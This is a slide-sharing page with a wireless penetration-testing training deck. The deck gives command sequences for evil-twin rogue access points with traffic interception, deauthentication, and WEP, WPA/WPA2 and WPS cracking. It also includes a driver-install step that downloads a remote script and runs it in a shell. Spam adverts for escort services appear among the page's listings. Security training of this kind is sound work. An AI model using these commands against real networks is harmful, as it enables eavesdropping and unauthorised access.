Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Mohammed Adam
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolMohammed Adam
 

More from Mohammed Adam (20)

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For Cybersecurity
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain Persistence
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profit
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network Fundamentals
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by Adam
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram community
 
Internet security
Internet securityInternet security
Internet security
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) Protocol
 
Network Security
Network SecurityNetwork Security
Network Security
 

Recently uploaded

Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

Wireless Penetration Testing

  • 2. Agenda WIRELESS PENETRATION TESTING • Lab Setup • Wi-Fi Network Fundamentals • Wireless Packets • Wi-Fi Network Interaction • Wireless Reconnaissance • Rogue Access points • Cracking WEP • Cracking WPA/WPA2 • WPS Attacks • Security Best Practices
  • 3. Lab Setup Hardware requirements • TP-Link WN722N • Alfa AWUS036H • Melon RTL8187L • Alfa AWUS036NHA • Panda PAU05 • Alfa AWUS036NEH
  • 4. Hardware of my choice for this session: TL-WN722N Wi-Fi Adaptor
  • 5. System Architecture • Minimum System Configuration • Windows 10 in Host Machine • Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU • Virtualisation Platform • Virtual box (https://www.virtualbox.org/) (or) • VMware (https://www.vmware.com/in/products/workstation- player/workstation-player-evaluation.html) • OS needs to be installed inside VM • Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
  • 6. Software Requirements • Aircrack-ng • Wifite • Bettercap • Johntheripper • Hashcat • coWPATTY • Kismet • Fluxion • Wi-Fi-Pumpkin
  • 7. Wi-Fi Network Fundamentals IEEE 802.11 • IEEE 802.11 is part of the IEEE 802 set of local area network (LAN) technical standards, and specifies the set of media access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication. • The standard and amendments provide the basis for wireless network products using the Wi-Fi brand and are the world's most widely used wireless computer networking standards. • IEEE 802.11 is used in most home and office networks to allow laptops, printers, smartphones, and other devices to communicate with each other and access the Internet without connecting wires. IEEE 802.11 is also a basis for vehicle-based communication networks with IEEE 802.11p.
  • 8. IEEE 802.11 (Contd.) • The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802). • The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products. • IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum availability allowed varies significantly by regulatory domain. • The protocols are typically used in conjunction with IEEE 802.2, and are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.
  • 12. Wireless Lan: 802.11 Standards Comparison Wi-Fi 7 Expected to Launch in second half of 2024, Currently we are using Wi-Fi 6
  • 14. Basic Terminologies(Contd.) Access Point (AP) • AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. • As a standalone device, the AP may have a wired connection to a router, but, in a wireless router, it can also be an integral component of the router itself. Service Set Identifier (SSID) • A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN). • An SSID is sometimes referred to as a "network name" This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.
  • 15. Basic Terminologies(Contd.) Basic Service Set Identifier (BSSID) • Its the MAC physical address of the access point or wireless router that is used to connect to the Wi-Fi. Extended Service Set Identifier (ESSID) • It is a wireless network, created by multiple access points, which appears to users as a single, seamless network, such as a network covering a home or office that is too large for reliable coverage by a single access point. Roaming • Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one.
  • 16. Basic Terminologies(Contd.) Channel • A Wi-Fi channel is the frequency at which your router sends out the information to your device. Most routers and devices support several bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz. Each of these ranges gets divided into smaller slots that are channels. Data Rate • Data rates varying modulation types and number of spatial streams; 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps. Beacon • Wi-Fi beacons are relatively short, regular transmissions from access points (APs) with a purpose to inform user devices (clients) about available Wi-Fi services and near-by access points. Clients use beacons to decide which AP with which to connect.
  • 18. Wireless Operating modes (Contd.) • Managed - Managed mode allows you to configure your laptop or desktop system as an AP for providing connectivity to other wireless stations. • Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices can communicate directly with each other. This type of wireless network is also called peer-to-peer mode. • Master - When your wireless card is in master mode it acts as an access point and it actively transmits a signal • Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. • Auto - the easiest way to configure a wireless interface and is enabled by default
  • 19. TP-Link TL-WN722N Driver Software installation: • Sudo apt update • Sudo apt upgrade • Sudo apt dist-upgrade • Sudo reboot • Sudo apt install bc • Sudo apt get install build-essential • Sudo apt-get install libelf-dev • Sudo apt install linux-headers-amd64 • Echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf" • Reboot • Git clone https://github.com/aircrack-ng/rtl8188eus • Cd rtl8188eus • sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
  • 20. Monitor Mode • Start the Kali OS in VMware or Virtual box • Plug-in USB Tplink Wireless Adapter (TL-WN722N) • Run following command • iwconfig
  • 21. Monitor Mode(Contd.) • By default it will be in Auto or Managed mode • Run following commands to switch to Monitor mode • Airmon-ng start wlan0 • Airmon-ng check kill [if any previous processes are running do this] • iwconfig • To Disable monitor mode run airmon-ng stop wlan0 • Restart network manager – service network-manager start
  • 23. Wireless Packets – IEEE 802.11 Mac Frame Structure
  • 30. WPA2 Personal and Enterprise
  • 33. Wireless Reconnaissance • Tools required: Bettercap, airodump-ng & Kismet • In Bettercap, run following commands • Choose interface before, bettercap --iface wlan0 • Help wifi • Wifi.recon on • Wifi.show • Wifi.recon off
  • 35. Wardriving with Kismet (Just for reference) • This can be achieved only, if we are moving or driving or roaming in a vehicle from multiple location to capture Wi-Fi hotspots with GPS Information. • Hardware required - Car, Laptop, Android Phone, Wifi Adapter • Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp), Google Earth • Reference blog link - https://veteransec.org/wifi-hacking-wardriving- with-an-android-phone-and-raspberry-pi-3/
  • 38. Rogue Access points requirements • Tools Required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi- pumpkin 3 • Wi-Fi pumpkin 3 installation • Git clone https://github.com/P0cL4bs/wifipumpkin3 • https://wifipumpkin3.github.io/docs/getting-started#installation • DNSmasq • apt-get install dnsmasq -y
  • 39. Creation of Rogue AP using Wi-Fi Pumpkin 3 • Plugin wireless adapter & It doesn’t required monitor mode enabled. Run following commands • Wifipumpkin3 • Set interface wlan0 • Set ssid hello • Set proxy noproxy • Start • It will create an Rogue AP with Name With name Hello
  • 40. Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.) • Once any device is connected to Rogue AP “Hello” we can intercept the traffic of connected clients easily. (Eviltwin attack)
  • 41. Creation of Rogue AP using Air-ng tools • Airodump-ng wlan0 • Airbase-ng -c 11 –e tplink –s –W 1 wlan0 • Airodump-ng –c 11 --bssid bssidoftplinknewlycreated –w 1 wlan0 • For Eviltwin/MITM attack we need DNSmasq • airbase-ng -e TP-Link -c 8 wlan0 [create fake ap for eviltwinattack] • at0 interface is created geany /etc/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1
  • 42. Creation of Rogue AP using Air-ng tools (Contd.) Run below commands in separate terminal • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with any device now, we can see the traffic
  • 44. Cracking WEP Create a rogue access point with WEP Cipher • Airbase-ng –c 11 –e hello –w 31:32:33:34:35 wlan0 Use the same Dnsmasq config here • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with device with WEP Fake AP • Airodump-ng wlan0 [ to check whether the fake ap is Up or not]
  • 45. Cracking WEP(Contd.) • DeAuthentication attack with aireplay-ng • Aireplay-ng --deauth 0 –a macaddressoffakeAP –c macaddressofclientconnected wlan0 • DeAuthentication attack with bettercap • Bettercap --iface wlan0 • Wifi.recon on & wifi.show • Wifi.deauth macaddressoffakeAP • Macchanger • Ifconfig wlan0 down • Macchanger –r wlan0 • Ifconfig wlan0 up
  • 46. Cracking WEP(Contd.) • Airdump-ng to dump the wep.cap file • airodump-ng -c 11 --bssid macaddfakeAP –w wepcrack wlan0 • Fake Authentication • Aireplay-ng --fakeauth 60 –e hello –a macaddresfakeAP –h macaddressofwlan0 wlan0 • ARP Request Replay attack • Aireplay-ng --arpreplay -e hello -a macaddfakeAP -h macaddrwlan0 wlan0 • Again perform deauth attack • Aireplay-ng --deauth 0 –a macaddfakeAP -c macaddrclientconnected wlan0 • Stop the deauth • Crack the WEP captured file using aircrack-ng • Aircrack-ng wep-cracking.cap [it will crack the WEP key]
  • 48. Cracking WEPDUMP File using Aircrack-ng
  • 54. Capture the WPA/WPA2 Handshake file • Run the following commands: • airmon-ng start wlan0 [Put the wireless adapter in Monitor mode] • airodump-ng wlan0 [Listen to all the APs which are alive] • airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture wpacracking handshake file with airodump-ng] • Do a Deauthentication attack manually by disconnection/connecting your mobile device to that AP • aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt [Pass the wordlist with handshake file]
  • 55. Capture the WPA/WPA2 Handshake file(Contd.)
  • 56. Cracking WPA/WPA2 using John the Ripper • John --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking.cap
  • 57. Cracking WPA/WPA2 using Wifite • Wifite –wpa • Before starting the attack connect with a client device
  • 59. Cracking WPS (PIN attacks) • wifite --wps [Using Wifite] • reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K [Using Reaver]
  • 60. Next-Gen Wireless Assessment tools Wi-Fi Pineapple
  • 61. Security Best Practices • Change default passwords • Restrict access to authorized users • Encrypt the data on your network • Protect your Service Set Identifier (SSID) • Install a firewall • Maintain antivirus software • Use file sharing with caution • Keep your access point software patched and up to date • Check your internet provider’s or router manufacturer’s wireless security options • Connect using a Virtual Private Network (VPN) Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003